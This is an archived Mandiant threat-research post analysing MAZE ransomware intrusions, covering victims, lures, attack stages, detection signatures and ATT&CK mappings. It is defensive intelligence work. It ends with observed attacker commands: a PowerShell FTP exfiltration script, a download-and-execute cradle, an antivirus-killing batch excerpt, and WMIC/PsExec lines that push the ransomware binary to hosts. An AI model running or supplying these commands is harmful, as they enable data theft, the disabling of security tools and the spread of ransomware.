{ "id": "0fd8008d-3abd-4cb5-8889-6d55cc7dc4b1", "created_at": "2026-04-06T00:18:14.348592Z", "updated_at": "2026-04-10T03:38:09.831898Z", "deleted_at": null, "sha1_hash": "82399333ab6ed280ea6f85aab99c3c267f3dec98", "title": "Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1496683, "plain_text": "Navigating the MAZE: Tactics, Techniques and Procedures\r\nAssociated With MAZE Ransomware Incidents\r\nBy Mandiant\r\nPublished: 2020-07-05 · Archived: 2026-04-05 14:11:34 UTC\r\nWritten by: Jeremy Kennelly, Kimberly Goody, Joshua Shilko\r\nTargeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across\r\nindustries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our\r\ninvestigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other\r\naspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware\r\nbeing used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate\r\nmodel.\r\nMalicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was\r\ninitially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise.\r\nMultiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in\r\nunderground forums and distinct tactics, techniques, and procedures across Mandiant incident response\r\nengagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from\r\nvictims who refuse to pay an extortion fee.\r\nThe combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise\r\nnetworks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based\r\non information derived from numerous Mandiant incident response engagements and our own research into the\r\nMAZE ecosystem and operations.\r\nMandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21\r\nwebinar.\r\nVictimology\r\nWe are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE\r\nwebsite since November 2019. These organizations have been primarily based in North America, although victims\r\nspanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial\r\nservices, construction, healthcare, technology, retail, and government has been impacted demonstrating that\r\nindiscriminate nature of these operations (Figure 1).\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 1 of 26\n\nFigure 1: Geographical and industry distribution of alleged MAZE victims\r\nMultiple Actors Involved in MAZE Ransomware Operations Identified\r\nMandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking\r\npartners to fulfill different functional roles within their teams. Additional information on these actors is available\r\nto Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment\r\nhas a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under\r\nan affiliate model and is not distributed by a single group. Under this business model, ransomware developers will\r\npartner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when\r\na victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE\r\nransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment.\r\nThis includes partners who provide initial access to organizations and pentesters who are responsible for\r\nreconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such\r\nas determining the victim organization and its annual revenues. This allows for specialization within the cyber\r\ncriminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 2 of 26\n\nFigure 2: MAZE ransomware panel\r\nMAZE Initially Distributed via Exploit Kits and Spam Campaigns\r\nMAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For\r\nexample, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware\r\nprimarily to individuals at organizations in Germany and the United States, although a significant number of\r\nemails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and\r\npackage delivery themes with document attachments or inline links to documents which download and execute\r\nMaze ransomware.\r\nOn November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject\r\nlines “Wichtige informationen uber Steuerruckerstattung” and “1\u00261 Internet AG - Ihre Rechnung 19340003422\r\nvom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the\r\nFinancial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent\r\nusing a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 3 of 26\n\nFigure 3: German-language lure\r\nOn November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located\r\nin the United states. These emails originated from a compromised or spoofed account and contained an inline link\r\nto download a Maze executable payload.\r\nOn November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United\r\nStates and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5).\r\nThese emails used the subjects “Missed package delivery” and \"Your AT\u0026T wireless bill is ready to view\" and\r\nwere sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably,\r\nthis registrant address was also used to create multiple Italian-language domains towards the end of November\r\n2019.\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 4 of 26\n\nFigure 4: AT\u0026T email lure\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 5 of 26\n\nFigure 5: Canada Post email lure\r\nShift to Post-Compromise Distribution Maximizes Impact\r\nActors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology\r\nprovides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged\r\nto apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors\r\nbehind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen\r\ndata.\r\nAlthough the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar,\r\nthere have been notable variations across intrusions that suggest attribution to distinct teams. Even within these\r\nteams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full\r\nlifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the\r\ndivergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these\r\noperations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks\r\nto many months.\r\nInitial Compromise\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 6 of 26\n\nThere are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent\r\nwith our observations of multiple actors who use MAZE soliciting partners with network access. The following\r\nare a sample of observations from several Mandiant incident response engagements:\r\nA user downloaded a malicious resume-themed Microsoft Word document that contained macros which\r\nlaunched an IcedID payload, which was ultimately used to execute an instance of BEACON.\r\nAn actor logged into an internet-facing system via RDP. The account used to grant initial access was a\r\ngeneric support account. It is unclear how the actor obtained the account's password.\r\nAn actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy\r\ntools to pivot into the internal network.\r\nAn actor logged into a Citrix web portal account with a weak password. This authenticated access enabled\r\nthe actor to launch a Meterpreter payload on an internal system.\r\nEstablish Foothold \u0026 Maintain Presence\r\nThe use of legitimate credentials and broad distribution of BEACON across victim environments appear to be\r\nconsistent approaches used by actors to establish their foothold in victim networks and to maintain presence as\r\nthey look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace\r\nbehaviors, we have observed an actor create their own domain account to enable latter-stage operations.\r\nAcross multiple incidents, threat actors deploying MAZE established a foothold in victim environments by\r\ninstalling BEACON payloads on many servers and workstations.\r\nWeb shells were deployed to an internet-facing system. The system level access granted by these web\r\nshells was used to enable initial privilege escalation and the execution of a backdoor.\r\nIntrusion operators regularly obtained and maintained access to multiple domain and local system accounts\r\nwith varying permissions that were used throughout their operations.\r\nAn actor created a new domain account and added it to the domain administrators group.\r\nEscalate Privileges\r\nAlthough Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect\r\ncredentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of\r\nBloodhound, and more manual searches for files containing credentials.\r\nLess than two weeks after initial access, the actor downloaded and interacted with an archive named\r\nmimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following\r\ndays the same mimi.zip archive was identified on two domain controllers in the impacted environment.\r\nThe actor attempted to find files with the word “password” within the environment. Additionally, several\r\narchive files were also created with file names suggestive of credential harvesting activity.\r\nThe actor attempted to identify hosts running the KeePass password safe software.\r\nAcross multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of\r\nobtaining credentials with domain administrator privileges.\r\nActors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their\r\nintrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 7 of 26\n\nto understand the impacted organization's Active Directory configuration. In this case the responsible\r\nactors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.\r\nReconnaissance\r\nMandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance\r\nacross observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights\r\nthe divergent ways in which the responsible actors interact with victim networks.\r\nIn some intrusions, reconnaissance activity occurred within three days of gaining initial access to the\r\nvictim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike\r\nto collect network, host, filesystem, and domain related information.\r\nMultiple built-in Windows commands were used to enable network, account, and host reconnaissance of\r\nthe impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to\r\nsupport this stage of their operations.\r\nPreliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained\r\na series of nslookup commands. The output of this script was copied into a file named '2.txt'.\r\nThe actor exfiltrated reconnaissance command output data and documents related to the IT environment to\r\nan attacker-controlled FTP server via an encoded PowerShell script.\r\nOver a period of several days, an actor conducted reconnaissance activity using Bloodhound,\r\nPowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate\r\ndirectories across internal hosts.\r\nAn actor employed the adfind tool and a batch script to collect information about their network, hosts,\r\ndomain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z'\r\nusing an instance of the 7zip archiving utility named 7.exe.\r\nAn actor used the tool smbtools.exe to assess whether accounts could login to systems across the\r\nenvironment.\r\nAn actor collected directory listings from file servers across an impacted environment. Evidence of data\r\nexfiltration was observed approximately one month later, suggesting that the creation of these directory\r\nlistings may have been precursor activity, providing the actors with data they may have used to identify\r\nsensitive data for future exfiltration.\r\nLateral Movement\r\nAcross the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike\r\nBEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and\r\napproaches were also observed.\r\nAttackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment,\r\nthough they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp\r\nsessions to enable both lateral movement and privilege escalation.\r\nThe actor moved laterally throughout some networks leveraging compromised service and user accounts\r\nobtained from the system on which they gained their initial foothold. This allowed them to obtain\r\nimmediate access to additional systems. Stolen credentials were then used to move laterally across the\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 8 of 26\n\nnetwork via RDP and to install BEACON payloads providing the actors with access to nearly one hundred\r\nhosts.\r\nAn actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a\r\nlocal administrator account.\r\nAt least one actor attempted to perform lateral movement using EternalBlue in early and late 2019;\r\nhowever, there is no evidence that these attempts were successful.\r\nComplete Mission\r\nThere was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While\r\nmalicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors\r\nemploying MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion\r\nfee.\r\nAn actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script\r\ndesigned to upload any files with .7z file extensions to a predefined FTP server using a hard-coded\r\nusername and password. This script appears to be a slight variant of a script first posted to Microsoft\r\nTechNet in 2013.\r\nA different base64-encoded PowerShell command was also used to enable this functionality in a separate\r\nincident.\r\nActors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.\r\nAn actor has been observed employing a file replication utility and copying the stolen data to a cloud file\r\nhosting/sharing service.\r\nPrior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across\r\nvarious corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP\r\nusing the WinSCP utility.\r\nIn addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network.\r\nNotably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will\r\ndouble, likely to create a sense of urgency to their demands.\r\nFive days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware\r\nbinary to 15 hosts within the victim environment and successfully executed it on a portion of these\r\nsystems.\r\nAttackers employed batch scripts and a series to txt files containing host names to distribute and execute\r\nMAZE ransomware on many servers and workstations across the victim environment.\r\nAn actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain\r\nadministrator account created earlier in the intrusion.\r\nImmediately following the exfiltration of sensitive data, the actors began deployment of MAZE\r\nransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The\r\nencryption process proceeded as follows:\r\nA batch script named start.bat was used to execute a series of secondary batch scripts with names\r\nsuch as xaa3x.bat or xab3x.bat.\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 9 of 26\n\nEach of these batch scripts contained a series of commands that employed the copy command,\r\nWMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE\r\nransomware (sss.exe) on hosts across the impacted environment\r\nNotably, forensic analysis of the impacted environment revealed MAZE deployment scripts\r\ntargeting ten times as many hosts as were ultimately encrypted.\r\nImplications\r\nBased on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used\r\nthroughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the\r\ninitial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our\r\nRansomware Protection and Containment Strategies blog post and the linked white paper.\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant\r\nSecurity Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security\r\nValidation Customer Portal for more information.\r\nA100-877 - Active Directory - BloodHound, CollectionMethod All\r\nA150-006 - Command and Control - BEACON, Check-in\r\nA101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1\r\nA101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2\r\nA101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3\r\nA100-878 - Command and Control - MAZE Ransomware, C2 Check-in\r\nA100-887 - Command and Control - MAZE, DNS Query #1\r\nA100-888 - Command and Control - MAZE, DNS Query #2\r\nA100-889 - Command and Control - MAZE, DNS Query #3\r\nA100-890 - Command and Control - MAZE, DNS Query #4\r\nA100-891 - Command and Control - MAZE, DNS Query #5\r\nA100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC\r\nA100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page\r\nA101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2\r\nA100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)\r\nA104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound,\r\nCollectionMethod All\r\nA104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell\r\nA104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy\r\nA104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks\r\nA104-037 - Host CLI - Credential Access, Discovery: File \u0026 Directory Discovery\r\nA104-052 - Host CLI - Credential Access: Mimikatz\r\nA104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)\r\nA104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 10 of 26\n\nA104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk\r\nA104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection\r\nA104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell\r\nA104-374 - Host CLI - Discovery: Enumerate Active Directory Forests\r\nA104-493 - Host CLI - Discovery: Enumerate Network Shares\r\nA104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User\r\nA104-482 - Host CLI - Discovery: Language Query Using reg query\r\nA104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory\r\nA104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note,\r\nDECRYPT-FILES.html Variant\r\nA104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note,\r\nDECRYPT-FILES.txt Variant\r\nA104-027 - Host CLI - Discovery: Process Discovery\r\nA104-028 - Host CLI - Discovery: Process Discovery with PowerShell\r\nA104-029 - Host CLI - Discovery: Remote System Discovery\r\nA104-153 - Host CLI - Discovery: Security Software Identification with Tasklist\r\nA104-083 - Host CLI - Discovery: System Info\r\nA104-483 - Host CLI - Exfiltration: PowerShell FTP Upload\r\nA104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message\r\nA104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media\r\nA100-879 - Malicious File Transfer - Adfind.exe, Download\r\nA150-046 - Malicious File Transfer - BEACON, Download\r\nA100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant\r\nA100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant\r\nA100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant\r\nA101-037 - Malicious File Transfer - MAZE Download, Variant #1\r\nA101-038 - Malicious File Transfer - MAZE Download, Variant #2\r\nA101-039 - Malicious File Transfer - MAZE Download, Variant #3\r\nA101-040 - Malicious File Transfer - MAZE Download, Variant #4\r\nA101-041 - Malicious File Transfer - MAZE Download, Variant #5\r\nA101-042 - Malicious File Transfer - MAZE Download, Variant #6\r\nA101-043 - Malicious File Transfer - MAZE Download, Variant #7\r\nA101-044 - Malicious File Transfer - MAZE Download, Variant #8\r\nA101-045 - Malicious File Transfer - MAZE Download, Variant #9\r\nA101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1\r\nA101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2\r\nA100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4\r\nA101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download\r\nA100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download\r\nA100-886 - Malicious File Transfer - Rclone.exe, Download\r\nA100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 11 of 26\n\nDetecting the Techniques\r\nPlatform Signature Name\r\nMVX (covers multiple FireEye technologies)\r\nBale Detection\r\nFE_Ransomware_Win_MAZE_1\r\nEndpoint Security\r\nWMIC SHADOWCOPY DELETE (METHODOLOGY)\r\nMAZE RANSOMWARE (FAMILY)\r\nNetwork Security\r\nRansomware.Win.MAZE\r\nRansomware.Maze\r\nRansomware.Maze\r\nMITRE ATT\u0026CK Mappings\r\nMandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of\r\nMAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion\r\nactivity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger\r\nclusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings,\r\nthough in some cases this access may have been provided by a separate threat actor(s).\r\nMAZE Group 1 MITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category Techniques\r\nInitial Access\r\nT1133: External Remote Services\r\nT1078: Valid Accounts\r\nExecution\r\nT1059: Command-Line Interface\r\nT1086: PowerShell\r\nT1064: Scripting\r\nT1035: Service Execution\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 12 of 26\n\nPersistence\r\nT1078: Valid Accounts\r\nT1050: New Service\r\nPrivilege Escalation T1078: Valid Accounts\r\nDefense Evasion\r\nT1078: Valid Accounts\r\nT1036: Masquerading\r\nT1027: Obfuscated Files or Information\r\nT1064: Scripting\r\nCredential Access\r\nT1110: Brute Force\r\nT1003: Credential Dumping\r\nDiscovery\r\nT1087: Account Discovery\r\nT1482: Domain Trust Discovery\r\nT1083: File and Directory Discovery\r\nT1135: Network Share Discovery\r\nT1069: Permission Groups Discovery\r\nT1018: Remote System Discovery\r\nT1016: System Network Configuration Discovery\r\nLateral Movement\r\nT1076: Remote Desktop Protocol\r\nT1105: Remote File Copy\r\nCollection T1005: Data from Local System\r\nCommand and Control T1043: Commonly Used Port\r\nT1105: Remote File Copy\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 13 of 26\n\nT1071: Standard Application Layer Protocol\r\nExfiltration\r\nT1002: Data Compressed\r\nT1048: Exfiltration Over Alternative Protocol\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nT1489: Service Stop\r\nMAZE Group 2 MITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category Techniques\r\nInitial Access T1193: Spearphishing Attachment\r\nExecution\r\nT1059: Command-Line Interface\r\nT1086: PowerShell\r\nT1085: Rundll32\r\nT1064: Scripting\r\nT1204: User Execution\r\nT1028: Windows Remote Management\r\nPersistence\r\nT1078: Valid Accounts\r\nT1050: New Service\r\nT1136: Create Account\r\nPrivilege Escalation\r\nT1078: Valid Accounts\r\nT1050: New Service\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 14 of 26\n\nDefense Evasion\r\nT1078: Valid Accounts\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1107: File Deletion\r\nT1036: Masquerading\r\nCredential Access\r\nT1003: Credential Dumping\r\nT1081: Credentials in Files\r\nT1171: LLMNR/NBT-NS Poisoning\r\nDiscovery\r\nT1087: Account Discovery\r\nT1482: Domain Trust Discovery\r\nT1083: File and Directory Discovery\r\nT1135: Network Share Discovery\r\nT1069: Permission Groups Discovery\r\nT1018: Remote System Discovery\r\nT1033: System Owner/User Discovery\r\nLateral Movement\r\nT1076: Remote Desktop Protocol\r\nT1028: Windows Remote Management\r\nCollection\r\nT1074: Data Staged\r\nT1005: Data from Local System\r\nT1039: Data from Network Shared Drive\r\nCommand and Control T1043: Commonly Used Port\r\nT1219: Remote Access Tools\r\nT1105: Remote File Copy\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 15 of 26\n\nT1071: Standard Application Layer Protocol\r\nT1032: Standard Cryptographic Protocol\r\nExfiltration\r\nT1020: Automated Exfiltration\r\nT1002: Data Compressed\r\nT1048: Exfiltration Over Alternative Protocol\r\nImpact T1486: Data Encrypted for Impact\r\nMAZE Group 3 MITRE ATT\u0026CK Mapping (FIN6)\r\nATT\u0026CK Tactic Category Techniques\r\nInitial Access\r\nT1133: External Remote Services\r\nT1078: Valid Accounts\r\nExecution\r\nT1059: Command-Line Interface\r\nT1086: PowerShell\r\nT1064: Scripting\r\nT1035: Service Execution\r\nPersistence\r\nT1078: Valid Accounts\r\nT1031: Modify Existing Service\r\nPrivilege Escalation\r\nT1055: Process Injection\r\nT1078: Valid Accounts\r\nDefense Evasion T1055: Process Injection\r\nT1078: Valid Accounts\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 16 of 26\n\nT1116: Code Signing\r\nT1089: Disabling Security Tools\r\nT1202: Indirect Command Execution\r\nT1112: Modify Registry\r\nT1027: Obfuscated Files or Information\r\nT1108: Redundant Access\r\nT1064: Scripting\r\nCredential Access T1003: Credential Dumping\r\nDiscovery\r\nT1087: Account Discovery\r\nT1482: Domain Trust Discovery\r\nT1083: File and Directory Discovery\r\nT1069: Permission Groups Discovery\r\nT1018: Remote System Discovery\r\nLateral Movement\r\nT1097: Pass the Ticket\r\nT1076: Remote Desktop Protocol\r\nT1105: Remote File Copy\r\nT1077: Windows Admin Shares\r\nCollection\r\nT1074: Data Staged\r\nT1039: Data from Network Shared Drive\r\nCommand and Control T1043: Commonly Used Port\r\nT1219: Remote Access Tools\r\nT1105: Remote File Copy\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 17 of 26\n\nT1071: Standard Application Layer Protocol\r\nT1032: Standard Cryptographic Protocol\r\nExfiltration T1002: Data Compressed\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nT1490: Inhibit System Recovery\r\nT1489: Service Stop\r\nExample Commands Observed in MAZE Ransomware Incidents\r\nfunction Enum-UsersFolders($PathEnum)\r\n{\r\n $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'\r\n Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue\r\n Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue\r\n Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue\r\n foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {\r\n foreach($SeachDir in $foldersArr) {\r\n Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue\r\n }\r\n }\r\n}\r\nPowerShell reconnaissance script used to enumerate directories\r\n$Dir=\"C:/Windows/Temp/\"\r\n#ftp server\r\n$ftp = \"ftp://\u003cIP Address\u003e/incoming/\"\r\n$user = \"\u003cusername\u003e\"\r\n$pass = \"\u003cpassword\u003e\"\r\n$webclient = New-Object System.Net.WebClient\r\n$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)\r\n#list every sql server trace file\r\nforeach($item in (dir $Dir \"*.7z\")){\r\n \"Uploading $item...\"\r\n $uri = New-Object System.Uri($ftp+$item.Name)\r\n $webclient.UploadFile($uri, $item.FullName)\r\n}\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 18 of 26\n\nDecoded FTP upload PowerShell script\r\npowershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpF\r\nDecoded FTP upload PowerShell script\r\n[…]\r\necho 7\r\necho 7\r\ntaskkill /im csrss_tc.exe /f\r\ntaskkill /im kwsprod.exe /f\r\ntaskkill /im avkwctl.exe /f\r\ntaskkill /im rnav.exe /f\r\ntaskkill /im crssvc.exe /f\r\nsc config CSAuth start= disabled\r\ntaskkill /im vsserv.exe /f\r\ntaskkill /im ppmcativedetection.exe /f\r\n[…]\r\ntaskkill /im sahookmain.exe /f\r\ntaskkill /im mcinfo.exe /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD\r\nnetsh advfirewall firewall set rule group=\"remote desktop\" new enable=Ye\r\nc:\\windows\\temp\\sss.exe\r\nExcerpt from windows.bat kill script\r\nstart copy sss.exe \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart copy sss.exe \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart copy windows.bat \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart copy windows.bat \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"c:\\wi\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"c:\\wi\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p 